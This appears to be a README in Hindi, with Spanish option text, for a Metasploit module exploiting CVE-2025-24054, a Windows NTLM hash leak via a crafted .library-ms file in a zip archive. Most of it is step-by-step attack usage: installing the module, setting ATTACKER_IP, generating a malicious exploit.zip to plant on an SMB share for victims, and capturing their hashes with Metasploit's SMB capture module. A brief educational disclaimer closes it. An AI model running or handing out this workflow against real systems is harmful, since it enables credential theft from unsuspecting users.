
मेटास्प्लॉइट मॉड्यूल जो CVE-2025-24054 (पूर्व 24071) का शोषण करता है। विंडोज लाइब्रेरी-आधारित आक्रमण वेक्टरों के लिए मेटास्प्लॉइट में एकीकृत NTLM लीक एक्सप्लॉइट।
यह भेद्यता .zip फ़ाइल को निकालने की प्रक्रिया के दौरान होती है। विशेष रूप से तैयार की गई .library-ms फ़ाइल के साथ इंटरैक्ट करने पर, विंडोज एक्सप्लोरर आंतरिक XML स्कीमा को संसाधित करता है और स्वचालित रूप से हमलावर द्वारा नियंत्रित एक दूरस्थ पथ पर SMB प्रमाणीकरण अनुरोध शुरू करता है।
यह व्यवहार उपयोगकर्ता के NTLM हैश के बहिर्गमन की अनुमति देता है, जिसमें फ़ाइल को अनज़िप करने के अलावा किसी अतिरिक्त इंटरैक्शन की आवश्यकता नहीं होती है। एक प्रूफ ऑफ कॉन्सेप्ट देखने के लिए मैं निम्नलिखित लिंक पर जाने की सलाह देता हूं: Fluffy - HTB.
हालांकि मूल रूप से इस भेद्यता को CVE-2025-24071 के रूप में प्रसारित किया गया था, वर्तमान में इसे आधिकारिक रूप से CVE-2025-24054 के रूप में ट्रैक किया जाता है।
रिपॉजिटरी क्लोन करें:
❯ git clone https://github.com/SecurityLayer404/CVE-2025-24054-24071---Metasploit-Module.git
❯ cd CVE-2025-24071
मॉड्यूल को Metasploit निर्देशिका में कॉपी करें:
❯ cp ntlm_hash_leak.rb ~/.msf4/modules/auxiliary/server/
यदि निर्देशिका मौजूद नहीं है, तो इसे इस प्रकार बनाएं:
❯ mkdir -p ~/.msf4/modules/auxiliary/server/
फिर मॉड्यूल को फिर से कॉपी करें।
Metasploit प्रारंभ करें और मॉड्यूल लोड करें:
❯ msfconsole -q
❯ use auxiliary/server/ntlm_hash_leak
यदि मॉड्यूल सही ढंग से लोड होता है तो आप इसे कॉन्फ़िगर करने के लिए विकल्प देख सकते हैं:
❯ show options
Module options (auxiliary/server/ntlm_hash_leak):
Name Current Setting Required Description
---- --------------- -------- -----------
ATTACKER_IP yes IP del atacante (donde corre Responder/Impacket)
FILENAME exploit.zip yes El nombre del archivo ZIP
LIBRARY_NAME documents.library-ms yes Nombre del archivo .library-ms
SHARE_NAME recurso yes Nombre del recurso compartido ficticio
मॉड्यूल कॉन्फ़िगर करें और चलाएं:
❯ set ATTACKER_IP 0.0.0.0 # Reemplaza con tu IP atacante
❯ set FILENAME exploit.zip # Nombre del payload que subiras al SMB (equipo objetivo)
❯ set LIBRARY_NAME malicious.library-ms # Nombre de .library-ms file
❯ set SHARE_NAME it_shared # Nombre del recurso SMB
❯ run
आउटपुट: मॉड्यूल एक .zip फ़ाइल उत्पन्न करता है जिसे बाद में पीड़ित द्वारा निष्पादन के लिए लक्ष्य SMB सर्वर पर अपलोड किया जाना चाहिए।
[+] exploit.zip stored at /home/user/.msf4/local/exploit.zip
[+] Archivo guardado en: /home/user/.msf4/local/exploit.zip
[*] Auxiliary module execution completed
अंत में, NTLM हैश प्राप्त करने के लिए Metasploit के SMB कैप्चर मॉड्यूल का उपयोग करें:
❯ use auxiliary/server/capture/smb
❯ set SRVHOST 0.0.0.0 # Reemplaza con tu IP atacante
❯ run
यदि आपको Metasploit से SMB सर्वर शुरू करने में समस्या होती है:
यह मॉड्यूल केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए विकसित किया गया था। इस प्रकार के उपकरणों का अनधिकृत उपयोग अवैध हो सकता है।
Security Layer